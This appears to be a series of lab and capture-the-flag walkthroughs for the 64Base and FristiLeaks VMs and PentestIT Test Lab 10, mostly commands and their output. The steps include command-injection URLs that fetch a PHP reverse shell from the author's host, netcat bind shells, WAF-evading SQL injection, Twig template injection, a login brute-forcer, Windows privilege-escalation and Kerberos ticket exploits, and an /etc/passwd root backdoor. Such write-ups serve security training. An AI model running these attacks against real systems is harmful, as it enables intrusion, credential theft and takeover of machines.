584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c32
52714d544a54626d51315a45566157464655614446525557383966516f3d0a

I connected them like a single string:

5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c3252714d544a54626d51315a45566157464655614446525557383966516f3d0a

And I decoded it from hex:

echo "5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c3252714d544a54626d51315a45566157464655614446525557383966516f3d0a" | xxd -p -r

I got this:

ZmxhZzJ7YUhSMGNITTZMeTkzZDNjdWVXOTFkSFZpWlM1amIyMHZkMkYwWTJnL2RqMTJTbmQ1ZEVaWFFUaDFRUW89fQo=

Now decode from base64:

echo "ZmxhZzJ7YUhSMGNITTZMeTkzZDNjdWVXOTFkSFZpWlM1amIyMHZkMkYwWTJnL2RqMTJTbmQ1ZEVaWFFUaDFRUW89fQo=" | base64 -d

And I got the second flag.

FLAG 3

For the third flag, I got it with a lot of luck. At this point I had no idea how to go further, then I tried to use curl on login.php:

curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 "http://192.168.1.16/Imperial-Class/BountyHunter/login.php"

And I got the third flag as output. I decoded the content from base64 and I got:

53cr3t5h377/Imperial-Class/BountyHunter/login.php?f=exec&c=id

Seems that I found a command injection vulnerability.

FLAG 4

So I browsed to http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=exec&c=id but I didn’t get the expected output. The I remembered the image into the blog post which says “IMPORTANT!!! USE SYSTEM INSTEAD OF EXEC TO RUN THE SECRET 5H377”. So I changed the URL to:

http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=system&c=id

I got the expected output and flag4 too. Decoding the content I found another credentials:

64base:64base5h377

FLAG 5

Now I need to get a shell so I tried:

http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=system&c=nc -lvp 1234 -e /bin/bash

But I get trolled:

░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▄▄███░░░░░
░░▄▄░░░░░░░░░░░░░░░░░░░░░░░░░███████░░░░
░░███▄░░░░░░░░░░░░░░░░░░░░░▄█████▀░█░░░░
░░▀█████▄▄▄▄▀▀▀▀▀▀▀▀░▄▄▄▄▄███▀▀░▀███░░░░
░░░░███▀▀░░░░░░░░░░░░░░▀▀▀███░░░░██▀░░░░
░░░░██░░░░░░▄░░░░░░░░░░░░░░░▀▀▄▄███░░░░░
░░░░▄█▄▄████▀█░█▄██▄▄░░░░░░░░░████▀░░░░░
░░░▄████████░░░██████▄▄▄▄░░░░░████░░░░░░
░░░███░█░▀██░░░▀███░█░░███▄▄░░░░▀█░░░░░░
░░░████▄███▄▄░░░███▄▄▄█████▀░░░░░██░░░░░
░░▄████▀▀░▀██▀░░░▀█████████░░░░░░██░░░░░
░░▀███░░░▄▄▀▀▀▄▄░░░░▀██████░░░░░░░█░░░░░
░░░███░░█░░░░░░░▀░░░░▀███▀░░░░░░░░█░░░░░
░░░████▄▀░░░░░░░░▀░░░████▄░░░░░░░░░█░░░░
░░░██████▄░░░░░░░░░▀▀████▀░░░░░░░░░█░░░░
░░▄█████████▀▀▀▀░░░░░░░░░░░░░░░░░░░▀█░░░
░░███████████▄▄▄▄░░░░░░░░░░░░░░░░░░░█▄░░
░░████████▀▀▀▀▀▀░░░░░░░░░░░░░░░░░░░░░█▄░
░░████████▄▄░░░░░░░░░░░░░░░░░░░░░░░░░░█░
░▄███████▄▄░░░░░░░░░░░░░░░░░░░░░░░░░░░░█
░▀▀▀▀▀▀▀▀▀█▀▀▀░░░░░░░░░░░░░░░░░░░░░░░░░█
Is this the net cat you are looking for?

LOL! So I tried to download a PHP reverse shell (pentestmonkey) from my local Apache Server:

http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=system&c=wget "http://192.168.1.4/shell.php"

I listed file but the command seemed to don’t work. So I tried to download it recursively:

http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=system&c=wget -r "http://192.168.1.4"

This command didn’t work too. So I tried to dump the variable with PHP function:

http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=var_dump&c=wget -r "http://192.168.1.4"

And I got:

';cat.real /etc/issue;date;uname -a;/sbin/ifconfig eth0|/usr/share/grep.real inet;echo sudo -u 64base wget -r http192.168.1.4"

Ok, change a bit the URL evading the escaped character:

http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=var_dump&c=wget -r 192.168.1.4

The output was correct so I tried to use system again but listing files it didn’t download anything. So I need to escape from the 64base binary file which seems to filter some commands. I tried with | and it worked:

http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=system&c=escape|wget -r 192.168.1.4

Now I have shell.php inside 192.168.1.4 folder. Now I started listen locally:

nc -lvp 1234

Then I browsed to http://192.168.1.16/Imperial-Class/BountyHunter/192.168.1.4/shell.php and I got a shell! Now I searched for the flag:

find -name "*flag*" 2>/dev/null

And I got it:

/var/www/html/admin/flag5{TG9vayBJbnNpZGUhIDpECg==}

FLAG 6

Flag5 was a file so I browsed to /var/www/html/admin and I typed:

python -m SimpleHTTPServer 8080

Then I downloaded the file from http://192.168.1.16:8080 and I checked that it was a JPG image with file command. So I extracted some informations with exiftool, in particular the comment:

4c5330744c5331435255644a546942535530456755464a4a566b46555253424c52566b744c5330744c517051636d39

I decoded it from hex and then from base64 and I got an SSH private key. Then I tried to connect to SSH but the key has a passphrase. So I used phrasendrescher to crack it:

pd pkey -d rockyou.txt -K key

The cracked passphrase is usetheforce. So I retried to connect to the SSH:

ssh root@192.168.1.16 -p 62964 -i key

It worked! And I got the latest flag. Decoding it alternatevely from hex and base64 a few times I got the secret plans of Black Star. And I finished the VM too…

[VULNHUB] 64Base: 1.0.1

[PENTESTIT] Test Lab V.10

INTRODUCTION

This new Lab of Pentestit was really hard but really interesting for me. They simulate a real company and a real penetration testing too. I spent many hours learning some new things and I want to thank the people who gave me hints to reach some of the tokens.

NETWORK

Network diagram: https://lab.pentestit.ru/images/labs/TL10_map.png
First of all, after connecting to the VPN, I launched nmap to discover the available ports:

nmap 192.168.101.9 -p 1-65535

This is the output:

Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-30 15:03 CET
Nmap scan report for gds.lab (192.168.101.9)
Host is up (0.077s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
443/tcp  open  https
8100/tcp open  xprint-server

Nmap done: 1 IP address (1 host up) scanned in 386.76 seconds

Browsing to http://192.168.101.9 I got a redirect to http://store.gds.lab but I couldn’t resolve the hostname. So I added that into /etc/hosts:

192.168.101.9 gds.lab
192.168.101.9 store.gds.lab

Now http://store.gds.lab works. After that I checked http://gds.lab too and I discovered an ownCloud page which told me to add http://cloud.gds.lab as trusted host, so I added another line into /etc/hosts:

192.168.101.9 gds.lab
192.168.101.9 store.gds.lab
192.168.101.9 cloud.gds.lab

MAIL

I spent lot of time on store without discover anything. I decided to skip to http://gds.lab:443 and analyzing the source code I discovered this comment:

Alfred Modlin said use this template

Also I found two email into the Contact page, so I have three e-mail to test:

s.locklear@gds.lab
j.wise@gds.lab
a.modlin@gds.lab

I browsed to http://gds.lab:8100 and I intercepted the POST request with BurpSuite. I sent the request to Intruder with the following payload:

POST / HTTP/1.1
Host: gds.lab:8100
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://gds.lab:8100/
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------12655615391746434301144945042
Content-Length: 775

-----------------------------12655615391746434301144945042
Content-Disposition: form-data; name="FormCharset"

utf-8
-----------------------------12655615391746434301144945042
Content-Disposition: form-data; name="Username"

a.modlin
-----------------------------12655615391746434301144945042
Content-Disposition: form-data; name="Password"

§password§
-----------------------------12655615391746434301144945042
Content-Disposition: form-data; name="SessionSkin"

*
-----------------------------12655615391746434301144945042
Content-Disposition: form-data; name="login"

Enter
-----------------------------12655615391746434301144945042
Content-Disposition: form-data; name="Skin"

Viewpoint
-----------------------------12655615391746434301144945042--

I used john.txt as wordlist and after some minutes I discovered the password: justdoit. I logged into the account and I discovered the token! There was also an email from j.wise:

Hi there!
Here is the app we talked about.
It's kinda like Google Authenticator - but the second factor is an SSH port currently opened.
So we have only one port opened for ssh at 172.16.0.1 at a time. This app will show it to you.
Please, check it on your phone for any bugs/suggestions and send them to me.

So the app can reveal us the test-ssh port.

SITE

Now I focused myself to http://gds.lab:443. I discovered an SQLi on http://gds.lab:443/post.php?id=1. Seems to be that there was a WAF which was protecting the site. After some tries I found that random case could bypass it. First of all I retrieved the number of columns, after some tries I discovered that they are 2:

http://gds.lab:443/post.php?id=') UNioN All SeLect CONcaT('TITLE'), CONcaT('POST')#

Remember to URL encode the string from ‘) to the end.

Then I discovered tables names:

http://gds.lab:443/post.php?id=') UNioN SeLect 1, GrouP_CONcaT(TabLe_nAmE) FroM InfOrMatIoN_scHemA.TabLes WheRe TabLe_sCheMa=database()#

I got this:

posts,users 

Cool! The table users it’s my target. Let’s discover columns names:

http://gds.lab:443/post.php?id=') UNioN SeLect 1, GrouP_CONcaT(ColUmN_nAmE) FroM InfOrMatIoN_scHemA.ColuMns WheRe TabLe_NaME='users'#

This is the output:

id,username,password 

And now the latest query:

http://gds.lab:443/post.php?id=') UNioN All SeLect username, PasSwoRd FroM site.users#

Perfect! I found username, which is e.lindsey and an hash:

$1$w9aURG9k$Wf1VIpv9VET3v3VWZ4YD8. 

Now I need to crack this. First of all I detected the hash with hash-identifier and it is an MD5(Unix), then I cracked it with hashcat:

optirun hashcat -a 0 -m 500 hash.txt rockyou.txt

And I got this:

lindsey123

Now I can login into site from /admin with e.lindsey:lindsey123 credentials and at the end I got the token.

SSH

Now I switched to ssh. With the credentials found I connected to it:

ssh e.lindsey@192.168.101.9

Searching around I found /data folder with /users subdirectory but when I was into it I couldn’t list files because I didn’t have read permissions. So I tried to bruteforce directories with a bash script:

#!/bin/bash
path="$1"

while IFS='' read -r directory || [[ -n "$directory" ]]; do
    if [ -d "$path/$directory" ]; then
      printf "[+] Directory $path/$directory exists!\n"
    fi
done < "$2"

I copied it into /tmp and I typed:

chmod +x brutedir.sh
./brutedir.sh /data/users users.txt

Then I bruted directories for each users found, in particular:

./brutedir.sh /data/users/rross raft-large-directories-lowercase.txt

At the end I found /data/users/rross/docs and I could list files inside the directory. Token found! I also found ssh key of a.modlin in /data/users/a.modlin.

TEST-SSH

To reach test-ssh I need to login into ssh and discover the hidden port. I decompiled the apk and I discovered that the port was changing randomly. So form the ssh box I typed:

ssh a.modlin@172.16.0.1 -p $(nmap -sT 172.16.0.1 -p 1-65535 | grep open | cut -d "/" -f 1) -i a.modlin_key

Now I am logged into test-ssh. I listed the files and I found the token.

BLOG

For blog I created an SSH tunnel:

ssh -L 8080:192.168.0.4:80 e.lindsey@192.168.101.9

Then I connected to http://localhost:8080 and a Joomla blog appeared. I searched a lot for that and finally I found this exploit which redirected me to https://github.com/XiphosResearch/exploits/tree/master/Joomraa. So I downloaded the python script and I executed it:

python joomraa.py -u reversebrain -p password -e mail@host.com http://localhost:8080

Then I logged in into http://localhost:8080/administrator page with the credentials that I created. Now I navigated to articles and I found an unpublished one, the token was the alias!

CAPTCHA

Again I opened an SSH tunnel:

ssh -L 8080:192.168.0.7:80 e.lindsey@192.168.101.9

Now I navigated to http://localhost:8080 and a blank image with an input form appeared. Checking /robots.txt I found this:

User-agent: *
Disallow: *.bak

Also I found /readme.txt:

Notice: don't forget - destroy all cached captcha every %time% via system.

When I tried to open the image location I got “500 Internal Server Error”, so I tried to remove .png and I added .bak but I still receive the same error, so I opened a private browser tab to avoid cookie problems and finally I downloaded captcha.bak. I opened it with a text editor:

file_put_contents($session_path. /captcha, serialize($_SESSION)); 
file_put_contents($session_path. /($_SESSION).php, ?php system($_GET[session]); ? 

It contains PHP code, the second line tell me that an RCE vulnerability exists, the backdoor is the “($_SESSION).php” file. So I closed and reopened the private tab, I copied the blank image location, I deleted captcha.png and I added ($_SESSION).php. Then I tried http://localhost:8080/sources/e092a74ec21bca8810d8b24e4995e5bda8ba37a83576663ac6d44f1fdc108af8eafc3582b3eeb8332ba7c9bccbb7d0f5ed1ca39bdf5924b4fe1552fb57f4ffc0ac348bb77cb613a82358e31e886fc48e77c50e795963d5f2e74192428d46f5d600fd4f/($_SESSION).php?session=ls and it worked! So I created a bind shell:

http://localhost:8080/sources/e092a74ec21bca8810d8b24e4995e5bda8ba37a83576663ac6d44f1fdc108af8eafc3582b3eeb8332ba7c9bccbb7d0f5ed1ca39bdf5924b4fe1552fb57f4ffc0ac348bb77cb613a82358e31e886fc48e77c50e795963d5f2e74192428d46f5d600fd4f/($_SESSION).php?session=nc -lvp 1234 -e /bin/bash

Then I connected to the shell from SSH machine:

nc -v 192.168.0.7 1234

Going back two directories Ii found token.token file.

HALL OF FAME

The next target is hall-of-fame. I created another SSH tunnel:

ssh -L 8080:192.168.0.8:80 e.lindsey@192.168.101.9

Bruteforcing directories and files I found /backup/passwords.txt:

creator:liverpool
developer:s2shj1BvYq83k6M

Logging with developer credentials I got a redirect to a page which displayed this:

$_SESSION contents:
Array ( [username] => editor [login] => editor [loggedIn] => 1 )
/dev/ password: 0bf190ffdc397fd51334d908845fbb1

So I browsed to /dev and I used dev:0bf190ffdc397fd51334d908845fbb1 as credentials. Then after lot of hours I discovered a SSTI vulnerability on hname paramter. I found a great article which explains in details what is it. At the end I found that the template in use was Twig. To get a shell I typed this:

http://localhost:8080/dev/index.php?hname={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("nc -lvp 1234 -e /bin/bash")}}

From the SSH box I ran:

nc -v 192.168.0.8 1234

Then find the token:

find / -name "*token*" 2>/dev/null

At the end I found the location:

/usr/share/nginx/token_70f01ee6914535591d7c4c96b7004709.txt

NEWS

Again another SSH tunnel:

ssh -L 8080:192.168.0.5:80 e.lindsey@192.168.101.9

Playing around on the site I discovered a reset password tool and I discovered two email:

user@gds.lab
admin@gds.lab

First of all I resetted the user password then I logged in with user@gds.lab:user credentials, after that I clicked on User Info:

Token  Your princess is in another castle!

Seems that we need to login as admin and click on User Info. Bruteforcing directories I found /old which haslogin, logout and reset password links. The latest one didn’t work. So first of all I resetted the admin password from the main page, then I logged in into /old with admin:admin credentials and at the and I browsed to http://localhost:8080/user_info.php and I found the token.

STORE

For store I browsed to http://store.gds.lab and I analyzed it for hours without success, then I created an SSH tunnel to dev-store:

ssh -L 8080:172.16.0.5:80 e.lindsey@192.168.101.9

It is OpenCart CMS, so I found a public exploit and I checked the SQLi:

http://localhost:8080/index.php?route=product/product&product_id=53%27

This is the output:

Fatal error: Uncaught exception 'Exception' with message 'Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Error No: 1064
select * from oc_download_stats where d_id=2 and p_id=53'' in /var/www/system/library/db/mysqli.php:40 Stack trace: #0 /var/www/system/library/db.php(16): DB\MySQLi->query('select * from o...', Array) #1 /var/www/catalog/controller/product/download_stat.php(39): DB->query('select * from o...') #2 /var/www/system/storage/modification/catalog/controller/product/product.php(499): DownloadStatRecord->load('2', '53'') #3 [internal function]: ControllerProductProduct->index() #4 /var/www/system/storage/modification/system/engine/action.php(51): call_user_func_array(Array, Array) #5 /var/www/catalog/controller/startup/router.php(25): Action->execute(Object(Registry)) #6 [internal function]: ControllerStartupRouter->index() #7 /var/www/system/storage/modification/system/engine/action.php(51): cal in /var/www/system/library/db/mysqli.php on line 40

Fire up sqlmap:

sqlmap -u "http://localhost:8080/index.php?route=product/product&product_id=53" -p product_id

Then I displayed all databases:

sqlmap -u "http://localhost:8080/index.php?route=product/product&product_id=53" -p product_id --dbs

Select the target db and display the tables:

sqlmap -u "http://localhost:8080/index.php?route=product/product&product_id=53" -p product_id -D testlab --tables

There is a token table, dump it:

sqlmap -u "http://localhost:8080/index.php?route=product/product&product_id=53" -p product_id -D testlab -T token --dump

Token found!

WEB-CONTROL

Fist of all I connected to SSH box and I scanned open ports:

nmap 192.168.0.6

This is the output:

Starting Nmap 6.00 ( http://nmap.org ) at 2016-12-09 12:26 MSK
Nmap scan report for 192.168.0.6
Host is up (0.0015s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
1503/tcp open  imtc-mcs

Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds

So I tried to connect to port 1503:

nc 192.168.0.6 1503

A login prompt appeared. I wrote a python script to bruteforce it:

import socket,sys,datetime,os

# Check parameters
if len(sys.argv) != 3:
     sys.stderr.write("[INFO] Usage: " + sys.argv[0] + "userlist passwordlist\n")
     sys.exit(1)

# Logo
print "[INFO] Web-Control bruter\n"

# Check list files
if not os.path.exists(sys.argv[1]):
     sys.stderr.write("[ERROR] userlist was not found!\n")
     sys.exit(1)

if not os.path.exists(sys.argv[2]):
     sys.stderr.write("[ERROR] passwordlist was not found!\n")
     sys.exit(1)

else:
     print "[INFO] Loading your lists...\n"

# Bruter
print "[INFO] Start bruting...\n"

with open(sys.argv[1]) as user_file:
    for user in user_file:
        with open(sys.argv[2]) as password_file:
            for password in password_file:
                # Connection
                try:
                    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    s.connect(('192.168.0.6', 1503))
                except:
                    print "[ERROR] Can't connect to host!\n"

                # Request username
                data = ""
                while True:
                    tmp = s.recv(1)
                    if tmp == "":
                        break
                    data += tmp
                    if data.endswith("Enter login: "):
                        break

                # Send username
                s.send(user)

                # Request password
                data = ""
                while True:
                    tmp = s.recv(1)
                    if tmp == "":
                        break
                    data += tmp
                    if data.endswith("Enter password: "):
                        break

                # Send password
                s.send(password)

                # Answer
                answer = s.recv(6)

                if "Error!" not in answer:
                    print "[BINGO!]\nUsername: " + user + "Password: " + password
                    sys.exit(1)

                s.close()

I uploaded it on SSH with top_shortlist.txt as user list and john.txt as password list (I had to remove a blank line with nano to get script works). After some times I got credentials:

admin:macintosh

So I logged in and this is what I got:

Select option:
    1. First script
    2. Second script
    3.Third script

To exit type -1.
Option: 

Seems a command injection vulnerability, after some tries I typed:

1|nc -lvp 1234 -e /bin/bash

Then I opened another SSH session and I connected to the shell:

nc -v 192.168.0.6 1234

To find the token:

find / -name "*token*" 2>/dev/null

Then I found it:

/var/opt/token.txt

WIN-TERM

First of all I created an SSH proxy and I configured proxychains locally:

ssh -D 8080 e.lindsey@192.168.101.9

Then I connected to the Windows machine with rdesktop:

rdesktop -r disk:share=/home/reversebrain/share 192.168.0.3

After some tries I found credentials (default password complexity):

GDS-OFFICE\e.lindsey
Lindsey123

On the desktop there were two icons: TrueCrypt and KeePass so I think I had to mount the hidden volume and then open KeePass database. I found a privilege escalation exploit, so I downloaded and copied it into /home/reversebrain/share so I could transfer it into Windows machine Desktop from Network panel. Then I opened the cmd and I typed:

cd Desktop
powershell -ExecutionPolicy Bypass
Import-Module .\exploit.ps1
Invoke-MS16-032

Now I have an elevated prompt. I changed dir to C:\Users\Administrator\Desktop, then I listed file and I found automount.bat. I executed it and TrueCrypt volume was mount. Now I opened KeePass, I opened mywork_gds.kbdx from TrueCrypt volume and when I prompt for a password I selected the key mywork_gds.key. Now I got token from General tab and rross cloud credentials:

rross:wwDr6rte

WIN-DC0

Now I need to exploit the Domain Controller. After some research I found a good YouTube video. From the exploited Windows machine I typed:

net user /Domain

I discovered the domain:

WIN-DC0.gds-office.lab

Now get the SID:

wmic useraccount where name="e.lindsey" get sid

This is the output:

SID
S-1-5-21-421115581-889488229-2938181853-1131

Then I switched to Kali box and I downloaded pykek. Then I typed:

sudo proxychains python ms14-068.py -u e.lindsey@gds-office.lab -p Lindsey123 -s S-1-5-21-421115581-889488229-2938181853-1131 -d 192.168.0.2

Then I uploaded mimikatz to the Windows machine, I opened the cmd, I changed directory to mimikatz and I typed:

klist purge
mimikatz.exe "Kerberos::ptc TGT_e.lindsey@gds-office.lab.ccache"

Now the ticket is injected! Let’s mount C drive:

net use \\WIN-DC0.gds-office.lab\admin$
net use K: \\WIN-DC0.gds-office.lab\C$

Now I mounted the C drive of WIN-DC0, browse to K:\Users\Administrator\Documents and I found token.txt.

CLOUD

Do you remember rross credentials?  I connected to SSH with e.lindsey then I typed:

ssh rross@172.16.0.3 -p 2222

I spent lot of time here and I discovered that there are 5 lxc, we need to connect to lxc1 to perform a privilege escalation. So login some times with rross from SSH until you got lxc1 hostname. Now I need to escalate privileges. Check which file can we execute with root privileges:

sudo -l

This is the output:

Matching Defaults entries for rross on lxc1:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User rross may run the following commands on lxc1:
    (root) NOPASSWD: /opt/scripts/clear_nginx_logs.sh

There is a script that can be executed with root privileges. Let’s check if we can write into it:

ls -l /opt/scripts/clear_nginx_logs.sh

The output:

-rwxrwxrwx 1 root root 46 Dec  9 13:30 /opt/scripts/clear_nginx_logs.sh

Wow! I could write to it. From my local box I generated a password:

openssl passwd -1 -salt xyz admin

Now I edited the script and I added the following line:

echo "reversebrain:\$1\$xyz\$R7n0ak3ptkexFwuStJOw9/:0:0:reversebrain:/root:/bin/bash" >> /etc/passwd

Execute it:

sudo /ope/scripts/clear_nginx_logs.sh

Now login as root:

su reversebrain

Now I need to escape from the lxc, I found an interesting PDF. On page 16 I found an exploit written in C, I copied it and I pasted into /tmp. Now compile it (remember to add ; at the end on return 0):

gcc -g -Wall secopenchroot.c -o secopenchroot

Then execute it:

chmod +x seconpenchroot
./secopenchroot /tmp "02 00 00 00 00 00 00 00"

Then cd to root and got the latest token!

[PENTESTIT] Test Lab V.10

[VULNHUB] FristiLeaks: 1.3

Second VM of my OSCP series. It is really really awesome.

DIRECTORY NAME TOO MUCH GUESSABLE

Start with an nmap scan:

nmap 192.168.1.23 -sV -p 1-65535 -T 4

This is the result:

Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-24 12:45 CET
Nmap scan report for 192.168.1.23
Host is up (0.012s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 123.59 seconds

So there is only a web server running on port 80. Now let’s scan the service with nikto:

nikto -h 192.168.1.23

This is the output:

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.23
+ Target Hostname:    192.168.1.23
+ Target Port:        80
+ Start Time:         2016-11-24 12:45:40 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
+ Server leaks inodes via ETags, header found with file /, inode: 12722, size: 703, mtime: Tue Nov 17 19:45:47 2015
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Entry '/cola/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/sisi/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/beer/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 3 entries which should be manually viewed.
+ PHP/5.3.3 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8348 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time:           2016-11-24 12:46:36 (GMT1) (56 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

So there are a few entries in /robots.txt that I need to check. The home page of the web site it’s a welcome page of the VM. So I opened the robots.txt file:

User-agent: *
Disallow: /cola
Disallow: /sisi
Disallow: /beer

I checked these three directories but there was, for every of them, an image which says that it was’nt the directory that I was searching. I tried some bruteforce attack for directory discovering without success, then I tried some guessing names and /fristi worked! A login form appeared and I checked the source code where I found this comment:

TODO:
We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz

Also there was a meta tag with the following phrase:

super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it.

Ok, there are some informations to discover here. Looking better into the source code I found that:

iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==

Let’s decode that. First of all I saved the string into a file called base64_password then I had to remove the newline from it so I typed:

cat base64_password | tr -d '\n' > decoded_password

I don’t know which type of file I decoded, if it was a text or an image so I checked it with that:

file decoded_password

This is the output:

decoded_password: PNG image data, 365 x 75, 8-bit/color RGB, non-interlaced

Nice, now rename it adding the .png extension. This is the content of the image:

keKkeKKeKKeKkEkkEk

So I have the password but I need an username. I remembered that the comment in the HTML page was signed by an user which is eezeepz. So I tried to log in with these credentials and it worked. Then I clicked into the only link in the page which redirected me to an upload form.

FIX THIS UPLOAD FORM

Only images were allowed. So I used Burp Suite to upload a .php reverse shell and I changed the extension to .php.gif and I edited the Content-Type to image/gif and finally I added the GIF89a; header. That was the output of the upload form:

Uploading, please wait
The file has been uploaded to /uploads

So I started listen locally:

nc -lvp 1234

And then I browsed to http://192.168.1.23/fristi/uploads/php-reverse-shell.php.gif. Now I have a reverse shell and I need to elevate my privileges to become root.

FRISTI, I PWN YOU!

First of all I ran the command id to check who I was (apache user), then I started to look around me. Browsing into /var/www I found notes.txt:

hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.

-jerry

Then I changed directory to /home and I discovered three users:
– admin
– eezeepz
– fristigod

I could read only the eezeepz home folder and so I listed the file inside it:

drwx---r-x. 5 eezeepz eezeepz  12K Nov 18  2015 .
drwxr-xr-x. 5 root    root    4.0K Nov 19  2015 ..
drwxrwxr-x. 2 eezeepz eezeepz 4.0K Nov 17  2015 .Old
-rw-r--r--. 1 eezeepz eezeepz   18 Sep 22  2015 .bash_logout
-rw-r--r--. 1 eezeepz eezeepz  176 Sep 22  2015 .bash_profile
